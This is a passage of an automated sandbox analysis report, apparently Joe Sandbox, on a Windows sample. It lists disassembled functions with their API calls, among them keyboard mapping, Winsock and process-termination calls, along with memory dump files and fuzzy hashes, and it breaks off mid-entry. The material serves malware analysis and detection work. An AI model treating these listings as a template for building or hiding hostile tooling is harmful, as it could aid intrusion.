                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscpy$_wcscat
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2037614760-0
                                                                                                                      • Opcode ID: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                                                                                                      • Instruction ID: a31902b62e60747640920a93463b8521eaffa8b258c4d783693f18b40f66422a
                                                                                                                      • Opcode Fuzzy Hash: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                                                                                                      • Instruction Fuzzy Hash: 65514531900115AACF13AF98C0409FDBBB0EF05318F51804AF680ABA92FBB45F82D794
                                                                                                                      Function 003E2ADC Relevance: 9.2, APIs: 6, Instructions: 158COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 003E2AF6
                                                                                                                      • VariantClear.OLEAUT32(00000013), ref: 003E2B68
                                                                                                                      • VariantClear.OLEAUT32(00000000), ref: 003E2BC3
                                                                                                                      • _memmove.LIBCMT ref: 003E2BED
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 003E2C3A
                                                                                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 003E2C68
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1101466143-0
                                                                                                                      • Opcode ID: fd4ad884be032b53fd5b273fcc31f5780569a50b3074e7dfc93532f0b790c446
                                                                                                                      • Instruction ID: a433dd2870f2378b7c1bfe5e5b38a5b9c958c68fe30680b28cec89233196366f
                                                                                                                      • Opcode Fuzzy Hash: fd4ad884be032b53fd5b273fcc31f5780569a50b3074e7dfc93532f0b790c446
                                                                                                                      • Instruction Fuzzy Hash: CE517CB5A00259EFDB24CF58C880EAAB7B8FF4C314B258559E949DB350E730E951CFA0
                                                                                                                      Function 004082DB Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetMenu.USER32(?), ref: 0040833D
                                                                                                                      • GetMenuItemCount.USER32(00000000), ref: 00408374
                                                                                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0040839C
                                                                                                                      • GetMenuItemID.USER32(?,?), ref: 0040840B
                                                                                                                      • GetSubMenu.USER32(?,?), ref: 00408419
                                                                                                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 0040846A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$Item$CountMessagePostString
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 650687236-0
                                                                                                                      • Opcode ID: 8f2aef67e401cebead34948594044c3ca543a2972848e8775362371ca978a326
                                                                                                                      • Instruction ID: c2c766a53df2c3fede14faa6dce11043fdfb08a55cad4f7967e2f799464aeebe
                                                                                                                      • Opcode Fuzzy Hash: 8f2aef67e401cebead34948594044c3ca543a2972848e8775362371ca978a326
                                                                                                                      • Instruction Fuzzy Hash: 71519035E00215EFCF11EFA4C941AAEB7F4EF49710F10446AE951BB391DB74AE418B98
                                                                                                                      Function 003F936F Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 003F9409
                                                                                                                      • WSAGetLastError.WS2_32(00000000), ref: 003F9416
                                                                                                                      • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 003F943A
                                                                                                                      • _strlen.LIBCMT ref: 003F9484
                                                                                                                      • _memmove.LIBCMT ref: 003F94CA
                                                                                                                      • WSAGetLastError.WS2_32(00000000), ref: 003F94F7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$_memmove_strlenselect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2795762555-0
                                                                                                                      • Opcode ID: cb2e638ea2b77086ac32649f872a4f1baafc040cf2e6673da001856933b7de15
                                                                                                                      • Instruction ID: 7a33eb5b92262a8661395eb8cab6a280845c1ff70e9e3ff98d281b1455e38e0e
                                                                                                                      • Opcode Fuzzy Hash: cb2e638ea2b77086ac32649f872a4f1baafc040cf2e6673da001856933b7de15
                                                                                                                      • Instruction Fuzzy Hash: 50418475600108AFCB16EF65CC85FAEB7B9EF58310F10426AF5169B2D1DB349E41CB60
                                                                                                                      Function 003E54E0 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 003E552E
                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003E5579
                                                                                                                      • IsMenu.USER32(00000000), ref: 003E5599
                                                                                                                      • CreatePopupMenu.USER32 ref: 003E55CD
                                                                                                                      • GetMenuItemCount.USER32(000000FF), ref: 003E562B
                                                                                                                      • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 003E565C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3311875123-0
                                                                                                                      • Opcode ID: d0239eb08b1d521678c257fcc88d02b9003f6ebedcd6a7ed90580e33db9b1f1f
                                                                                                                      • Instruction ID: 9f07f3876fc696cea970f7a2e13482edc842d481db76c16d709c17c46396cce1
                                                                                                                      • Opcode Fuzzy Hash: d0239eb08b1d521678c257fcc88d02b9003f6ebedcd6a7ed90580e33db9b1f1f
                                                                                                                      • Instruction Fuzzy Hash: F251D270600AA5EFDF22CF69C888BADBBF5AF1531CF504729E4169B2D1D3B09944CB51
                                                                                                                      Function 003BB18C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003BAF7D: GetWindowLongW.USER32(?,000000EB), ref: 003BAF8E
                                                                                                                      • BeginPaint.USER32(?,?,?,?,?,?), ref: 003BB1C1
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 003BB225
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 003BB242
                                                                                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 003BB253
                                                                                                                      • EndPaint.USER32(?,?), ref: 003BB29D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1827037458-0
                                                                                                                      • Opcode ID: 3ce7cc12fb7e15e63b440efe783ed035cd3f41e6202bc4305fc0d10e8d26c622
                                                                                                                      • Instruction ID: 31f2983eb4e447ec382b992baed4658d79b4efded5a66bbf146064e9bcf0d74c
                                                                                                                      • Opcode Fuzzy Hash: 3ce7cc12fb7e15e63b440efe783ed035cd3f41e6202bc4305fc0d10e8d26c622
                                                                                                                      • Instruction Fuzzy Hash: 7241D370500200AFC721DF14CC84FBA7BE8EB45324F140579FA958B6B2DBB19C45DB66
                                                                                                                      Function 0040E9C8 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003BB58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 003BB5EB
                                                                                                                        • Part of subcall function 003BB58B: SelectObject.GDI32(?,00000000), ref: 003BB5FA
                                                                                                                        • Part of subcall function 003BB58B: BeginPath.GDI32(?), ref: 003BB611
                                                                                                                        • Part of subcall function 003BB58B: SelectObject.GDI32(?,00000000), ref: 003BB63B
                                                                                                                      • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0040E9F2
                                                                                                                      • LineTo.GDI32(00000000,00000003,?), ref: 0040EA06
                                                                                                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0040EA14
                                                                                                                      • LineTo.GDI32(00000000,00000000,?), ref: 0040EA24
                                                                                                                      • EndPath.GDI32(00000000), ref: 0040EA34
                                                                                                                      • StrokePath.GDI32(00000000), ref: 0040EA44
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 43455801-0
                                                                                                                      • Opcode ID: accbbe2a91ea288e3a91c0d5c150426f700a5d8f593b30aaf01cab2d7399ffbb
                                                                                                                      • Instruction ID: 9a120dc70cfc744a70418e1331406016825843ec6d4625fe5af77ff53fd96d31
                                                                                                                      • Opcode Fuzzy Hash: accbbe2a91ea288e3a91c0d5c150426f700a5d8f593b30aaf01cab2d7399ffbb
                                                                                                                      • Instruction Fuzzy Hash: 7B11097650014DBFDF129F90DC88EAA7FADFB08354F048022FA095A171D7719D56DBA4
                                                                                                                      Function 003DEF91 Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetDC.USER32(00000000), ref: 003DEFB6
                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 003DEFC7
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003DEFCE
                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 003DEFD6
                                                                                                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 003DEFED
                                                                                                                      • MulDiv.KERNEL32(000009EC,?,?), ref: 003DEFFF
                                                                                                                        • Part of subcall function 003DA83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,003DA79D,00000000,00000000,?,003DAB73), ref: 003DB2CA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 603618608-0
                                                                                                                      • Opcode ID: 845b291ab1b7b1ce5b23329b37734ae3973639e644429d557cbe842c62dfbeb6
                                                                                                                      • Instruction ID: a38210a3b5f7214f6d7ca06d4694719a074e13f5ca71523e79be196aecf034e0
                                                                                                                      • Opcode Fuzzy Hash: 845b291ab1b7b1ce5b23329b37734ae3973639e644429d557cbe842c62dfbeb6
                                                                                                                      • Instruction Fuzzy Hash: E3017175E00205BBEB109BA59C45A5EBFB8EB48751F004066EA04EB390D6709C018B61
                                                                                                                      Function 003C87D7 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __init_pointers.LIBCMT ref: 003C87D7
                                                                                                                        • Part of subcall function 003C1E5A: __initp_misc_winsig.LIBCMT ref: 003C1E7E
                                                                                                                        • Part of subcall function 003C1E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 003C8BE1
                                                                                                                        • Part of subcall function 003C1E5A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 003C8BF5
                                                                                                                        • Part of subcall function 003C1E5A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 003C8C08
                                                                                                                        • Part of subcall function 003C1E5A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 003C8C1B
                                                                                                                        • Part of subcall function 003C1E5A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 003C8C2E
                                                                                                                        • Part of subcall function 003C1E5A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 003C8C41
                                                                                                                        • Part of subcall function 003C1E5A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 003C8C54
                                                                                                                        • Part of subcall function 003C1E5A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 003C8C67
                                                                                                                        • Part of subcall function 003C1E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 003C8C7A
                                                                                                                        • Part of subcall function 003C1E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 003C8C8D
                                                                                                                        • Part of subcall function 003C1E5A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 003C8CA0
                                                                                                                        • Part of subcall function 003C1E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 003C8CB3
                                                                                                                        • Part of subcall function 003C1E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 003C8CC6
                                                                                                                        • Part of subcall function 003C1E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 003C8CD9
                                                                                                                        • Part of subcall function 003C1E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 003C8CEC
                                                                                                                        • Part of subcall function 003C1E5A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 003C8CFF
                                                                                                                      • __mtinitlocks.LIBCMT ref: 003C87DC
                                                                                                                        • Part of subcall function 003C8AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(0045AC68,00000FA0,?,?,003C87E1,003C6AFA,004567D8,00000014), ref: 003C8AD1
                                                                                                                      • __mtterm.LIBCMT ref: 003C87E5
                                                                                                                        • Part of subcall function 003C884D: RtlDeleteCriticalSection.NTDLL(00000000), ref: 003C89CF
                                                                                                                        • Part of subcall function 003C884D: _free.LIBCMT ref: 003C89D6
                                                                                                                        • Part of subcall function 003C884D: RtlDeleteCriticalSection.NTDLL(0045AC68), ref: 003C89F8
                                                                                                                      • __calloc_crt.LIBCMT ref: 003C880A
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 003C8833
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2942034483-0
                                                                                                                      • Opcode ID: 45649e7fc16ac0c14ccabb6a242b42791b1aa9f09ee49862fe2c98baf31704bf
                                                                                                                      • Instruction ID: 1acba8060e99022844515c6157f5d79c3f4ce9e655cd87642b554fd2119e06bb
                                                                                                                      • Opcode Fuzzy Hash: 45649e7fc16ac0c14ccabb6a242b42791b1aa9f09ee49862fe2c98baf31704bf
                                                                                                                      • Instruction Fuzzy Hash: 80F09A321197115AE2277B38BC07F9B2AC08F42731B610A2EF460DA4E2FF208E514364
                                                                                                                      Function 003EA3D2 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1423608774-0
                                                                                                                      • Opcode ID: 51a4b6df54313deb73b5933b87d5720b93a9d86778617fc64b374d57d5e91257
                                                                                                                      • Instruction ID: 49e6e12e00d82c41a2dd211c0fa66e3ac236e10d4010be5642dda395eb809f7d
                                                                                                                      • Opcode Fuzzy Hash: 51a4b6df54313deb73b5933b87d5720b93a9d86778617fc64b374d57d5e91257
                                                                                                                      • Instruction Fuzzy Hash: CE01F936601621DBD7262B55EC48DEB7765FF49702B410279F503920E1CB70BC01CB61
                                                                                                                      Function 003A1867 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 003A1898
                                                                                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 003A18A0
                                                                                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 003A18AB
                                                                                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 003A18B6
                                                                                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 003A18BE
                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 003A18C6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Virtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4278518827-0
                                                                                                                      • Opcode ID: 92d35fd9ef8b38a07e7d482e5ed35427b10b0c8ff08f8fad0183edb9c0c3a021
                                                                                                                      • Instruction ID: 7bc823aaa801bf8c2c60d550a2accf1d7cd83ffb351b6f0b4056566632355675
                                                                                                                      • Opcode Fuzzy Hash: 92d35fd9ef8b38a07e7d482e5ed35427b10b0c8ff08f8fad0183edb9c0c3a021
                                                                                                                      • Instruction Fuzzy Hash: 010167B0A02B5ABDE3008F6A8C85B52FFB8FF19354F04415BA15C47A42C7F5A864CBE5
                                                                                                                      Function 003E84F4 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 003E8504
                                                                                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 003E851A
                                                                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 003E8529
                                                                                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003E8538
                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003E8542
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003E8549
                                                                                                                      Memory Dump Source
